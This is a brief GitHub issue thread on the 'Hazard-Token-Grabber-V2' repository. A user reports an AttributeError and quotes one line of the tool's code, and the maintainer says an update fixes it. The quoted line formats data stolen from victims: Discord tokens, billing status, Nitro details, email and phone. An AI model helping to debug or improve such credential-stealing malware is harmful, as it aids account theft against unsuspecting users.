### ISSUE TITLE
:trollface: 

### ISSUE THREAD

**Issue by EndermanHackerVN** [Rdimo/Hazard-Token-Grabber-V2#14]
`f.write(f"{' '*17}{user}\n{'-'*50}\nToken: {token}\nHas Billing: {billing.content}\nNitro: {has_nitro}\nNitro Expires in: {days_left} day(s)\nEmail: {email}\nPhone: {phone}\n[Avatar]({url})\n\n")
AttributeError: 'bool' object has no attribute 'content'`

**Comment by Rdimo** [comment]
fixed in the new update
